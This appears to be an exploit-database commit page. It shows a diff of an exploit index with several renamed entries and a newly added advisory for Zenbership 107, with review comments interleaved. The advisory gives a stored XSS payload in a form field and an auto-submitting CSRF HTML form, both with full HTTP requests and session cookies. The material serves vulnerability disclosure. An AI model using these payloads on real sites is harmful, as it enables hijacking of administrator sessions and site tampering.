DB: 2016-10-24
1 new exploits

dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)
dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)

Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs
Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)

Microsoft Excel 2010 - Crash PoC (2)
Microsoft Excel 2010 - Crash (PoC) (2)

Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)
Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)

The Unarchiver 3.11.1 - '.tar.Z' Crash PoC
The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)

Microsoft Edge - Function.apply Infomation Leak (MS16-119)
Microsoft Edge - 'Function.apply' Information Leak (MS16-119)

Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)
Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)

Zenbership 107 - Multiple Vulnerabilities
Offensive Security committed Oct 24, 2016
1 parent 6cd9390 commit e380b20
Showing 2 changed files with 191 additions and 7 deletions.
15 changes: 8 additions & 7 deletions files.csv
Expand Up @@ -33425,7 +33425,7 @@ id,file,description,date,author,platform,type,port
36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 / 4.1.1 - Authentication Bypass",2012-05-13,fdiskyou,windows,remote,5900
36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0
36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)",2014-09-29,fdiskyou,linux,remote,0
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - /help/helpredir.aspx guide Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - /webi/webi_modify.aspx id Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
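Review bot: the 36933 change is a suffix normalization only ("Command Injection PoC (Shellshock)" becomes "Command Injection (PoC) (Shellshock)"), bringing the entry in line with the "(PoC)" form already used by entries such as 40618 further down this file. No objection to the rename itself; since this commit fixes four bare "PoC" suffixes one entry at a time, a single pass over files.csv for the remaining ones would avoid repeating the same edit in later DB commits.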
Expand Down Expand Up @@ -35840,7 +35840,7 @@ id,file,description,date,author,platform,type,port
39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - SHFolder.dll Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0
39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0
39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0
39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)",2016-03-01,"Shantanu Khandelwal",windows,dos,0
39513,platforms/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80
39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080
Expand Down Expand Up @@ -36123,7 +36123,7 @@ id,file,description,date,author,platform,type,port
39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0
39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps,0
39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC (2)",2016-05-16,HauntIT,windows,dos,0
39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash (PoC) (2)",2016-05-16,HauntIT,windows,dos,0
39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0
39822,platforms/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",multiple,webapps,0
Expand Down Expand Up @@ -36569,7 +36569,7 @@ id,file,description,date,author,platform,type,port
40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0
40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege",2016-09-30,Tulpa,windows,local,0
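Review bot: the 40436 edit only adds quotes around 'Stagefright' and leaves the version field as "Android 5.0 <= 5.1.1", which a reader can take as a comparison rather than a range. Since the line is being touched anyway, either state the bounds explicitly ("Android 5.0 - 5.1.1") or keep the notation deliberately consistent with the "2.6.22 < 3.9" form used for the Dirty COW entries later in this file, but do not leave the two styles mixed within one commit.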
Expand Down Expand Up @@ -36675,7 +36675,7 @@ id,file,description,date,author,platform,type,port
40566,platforms/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps,0
40567,platforms/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local,0
40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0
40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",osx,dos,0
40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
40572,platforms/windows/local/40572.cs,"Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
40573,platforms/windows/local/40573.cs,"Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
Expand Down Expand Up @@ -36706,12 +36706,12 @@ id,file,description,date,author,platform,type,port
40599,platforms/windows/dos/40599.txt,"Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
40600,platforms/windows/dos/40600.txt,"Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
40601,platforms/windows/dos/40601.txt,"Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40603,platforms/windows/dos/40603.html,"Microsoft Edge - 'Function.apply' Information Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
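Review bot: the 40609 rename pins a version ("Hak5 WiFi Pineapple 2.4") that neither the commit message nor the surrounding context justifies; confirm it is taken from the module's own target metadata in 40609.rb before it lands in the index, because a wrong version silently narrows what a search over files.csv returns. The 40603 change is a straight typo fix ("Infomation" to "Information") plus quoting of 'Function.apply', no concerns there.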
Expand All @@ -36720,3 +36720,4 @@ id,file,description,date,author,platform,type,port
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0
40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0
40620,platforms/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",2016-10-23,Besim,php,webapps,0
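Review bot: the new 40620 entry is indexed as "Zenbership 107", but the advisory it points to (platforms/php/webapps/40620.txt) titles itself "(latest version)" and lists "<= latest version" as affected, so the version in the index is not traceable to the advisory text; fix one side or the other before this lands. Date (2016-10-23) and author (Besim) do match the advisory header.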
183 changes: 183 additions & 0 deletions platforms/php/webapps/40620.txt
@@ -0,0 +1,183 @@
1. ADVISORY INFORMATION
========================================
Title: Zenbership (latest version) - Multiple Vulnerabilities
Application: Zenbership
Class: Sensitive Information disclosure
Versions Affected: <= latest version )
Vendor URL: https://www.zenbership.com/
Software URL: https://www.zenbership.com/Download
Bugs: CSRF / Persistent Cross Site Scripting
Date of found: 23.10.2016
Author: Besim


2.CREDIT
========================================
Those vulnerabilities was identified by Besim ALTINOK and Mrs. Meryem AKDOĞAN


3. VERSIONS AFFECTED
========================================
<= latest version



4. TECHNICAL DETAILS & POC
========================================


PR1 - Stored Cross Site Scripting
========================================

1 ) Admin login admin panel
2 ) Create contact form for guest (http://site_name/path/register.php?action=reset&id=3c035c2)
3 ) Attacker enter xss payload to last name input
4 ) XSS Payload run when admin looked contact page (http://site_name/path/admin/index.php?l=contacts)
5 ) Vulnerability Parameter and Payload : &last_name=<Script>alert('ExploitDB')</Script>

## HTTP Request ##

POST /zenbership/pp-functions/form_process.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/zenbership/register.php?action=reset&id=3c035c2
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44; zen_cart=WJL-1484545251; zen_0176e737b450bbd83f5fc1066=253782
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 153

- POST DATA

page=1
&session=zen_0176e737b450bbd83f5fc1066
&first_name=Besim
&last_name=<Script>alert('ExploitDB')</Script>
&email=exploit@yopmail.com


PR2 - CSRF
========================================

1 ) Attacker can add new event with xss payload (stored)
- File : admin/cp-functions/event-add.php

HTTP Request and CSRF PoC
=========================


## HTTP Request ##

POST /zenbership/admin/cp-functions/event-add.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://site_name/zenbership/admin/index.php?l=events
Content-Length: 1206
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_cart=LKQ-4724862238; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44
Connection: close


- POST DATA


id=JFW996951
&ext=
&edit=0
&event[id]=JFW996951&event[status]=1
&event[name]=<Script>alert('Meryem-ExploitDB');</Script>
&event[tagline]=Meryem&event[description]=<p>Meryem AKDOGAN</p>
&event[post_rsvp_message]=<p>Meryem AKDOGAN</p>
&event[calendar_id]=1
&event[custom_template]=
&tags=
&event[starts]=2016-10-26 00:00:00
&event[ends]=2016-10-28 00:00:00
&event[start_registrations]=2016-10-24 00:00:00
&event[close_registration]=&event[early_bird_end]=
&event[online]=0&event[location_name]=Turkey
&event[url]=&event[address_line_1]=
&event[address_line_2]=&event[city]=
&event[state]=&event[zip]=
&event[country]=
&event[phone]=
&limit_attendees_dud=0
&event[max_rsvps]=
&event[members_only_view]=0
&event[members_only_rsvp]=0
&event[allow_guests]=1
&event[max_guests]=1
&form[col2][Account Overview]=section
&form[col2][company_name]=1
&form[col2][address_line_1]=0
&form[col2][address_line_2]=0
&form[col2][city]=0
&form[col2][state]=0
&form[col2][zip]=0
&form[col2][country]=0
&form[col2][url]=0



## CSRF PoC ##

<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/path/admin/cp-functions/event-add.php" method="POST">
<input type="hidden" name="id" value="OXH978786" />
<input type="hidden" name="ext" value="" />
<input type="hidden" name="edit" value="0" />
<input type="hidden" name="event&#91;id&#93;" value="OXH978786" />
<input type="hidden" name="event&#91;status&#93;" value="1" />
<input type="hidden" name="event&#91;name&#93;" value="<script>alert&#40;&apos;Meryem&#45;ExploitDB&apos;&#41;&#59;<&#47;Script>" />
<input type="hidden" name="event&#91;tagline&#93;" value="meryem" />
<input type="hidden" name="event&#91;description&#93;" value="<p>Meryem&#32;AKDOGAN<&#47;p>&#13;&#10;" />
<input type="hidden" name="event&#91;post&#95;rsvp&#95;message&#93;" value="<p>Meryem&#32;AKDOGAN<&#47;p>&#13;&#10;" />
<input type="hidden" name="event&#91;calendar&#95;id&#93;" value="1" />
<input type="hidden" name="event&#91;custom&#95;template&#93;" value="" />
<input type="hidden" name="tags" value="meryem" />
<input type="hidden" name="event&#91;starts&#93;" value="2016&#45;10&#45;26&#32;00&#58;00&#58;00" />
<input type="hidden" name="event&#91;ends&#93;" value="2016&#45;10&#45;28&#32;00&#58;00&#58;00" />
<input type="hidden" name="event&#91;start&#95;registrations&#93;" value="2016&#45;10&#45;24&#32;00&#58;00&#58;00" />
<input type="hidden" name="event&#91;close&#95;registration&#93;" value="" />
<input type="hidden" name="event&#91;early&#95;bird&#95;end&#93;" value="" />
<input type="hidden" name="event&#91;online&#93;" value="0" />
<input type="hidden" name="event&#91;location&#95;name&#93;" value="Turkey" />
<input type="hidden" name="event&#91;url&#93;" value="" />
<input type="hidden" name="event&#91;address&#95;line&#95;1&#93;" value="" />
<input type="hidden" name="event&#91;address&#95;line&#95;2&#93;" value="" />
<input type="hidden" name="event&#91;city&#93;" value="" />
<input type="hidden" name="event&#91;state&#93;" value="" />
<input type="hidden" name="event&#91;zip&#93;" value="" />
<input type="hidden" name="event&#91;country&#93;" value="" />
<input type="hidden" name="event&#91;phone&#93;" value="" />
<input type="hidden" name="limit&#95;attendees&#95;dud" value="0" />
<input type="hidden" name="event&#91;max&#95;rsvps&#93;" value="" />
<input type="hidden" name="event&#91;members&#95;only&#95;view&#93;" value="0" />
<input type="hidden" name="event&#91;members&#95;only&#95;rsvp&#93;" value="0" />
<input type="hidden" name="event&#91;allow&#95;guests&#93;" value="1" />
<input type="hidden" name="event&#91;max&#95;guests&#93;" value="1" />
<input type="hidden" name="form&#91;col2&#93;&#91;Account&#32;Overview&#93;" value="section" />
<input type="hidden" name="form&#91;col2&#93;&#91;company&#95;name&#93;" value="1" />
<input type="hidden" name="form&#91;col2&#93;&#91;address&#95;line&#95;1&#93;" value="0" />
<input type="hidden" name="form&#91;col2&#93;&#91;address&#95;line&#95;2&#93;" value="0" />
<input type="hidden" name="form&#91;col2&#93;&#91;city&#93;" value="0" />
<input type="hidden" name="form&#91;col2&#93;&#91;state&#93;" value="0" />
<input type="hidden" name="form&#91;col2&#93;&#91;zip&#93;" value="0" />
<input type="hidden" name="form&#91;col2&#93;&#91;country&#93;" value="0" />
<input type="hidden" name="form&#91;col2&#93;&#91;url&#93;" value="0" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

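Review bot: in PR2 the captured event-add.php request carries "X-Requested-With: XMLHttpRequest", a header that the CSRF PoC's plain HTML form cannot set from a foreign origin, so if the endpoint keys on that header the PoC will not fire; the advisory should say whether the form was actually tested from a third-party origin, and should state plainly that the POST body contains no anti-CSRF token, which is the real evidence for the finding. In PR1 the "guest" form_process.php request is shown with the admin's zen_admin_ses cookie and step 1 is an admin login, so the write-up does not demonstrate that an unauthenticated guest can plant the payload; re-capture that request from a logged-out session. In the header block, "Class: Sensitive Information disclosure" contradicts "Bugs: CSRF / Persistent Cross Site Scripting", "Versions Affected: <= latest version )" has a stray parenthesis and should name the release that was tested (files.csv says 107), and "Those vulnerabilities was identified" should read "were identified". Finally, the live PHPSESSID and zen_admin_ses values pasted into both requests should be redacted before publication.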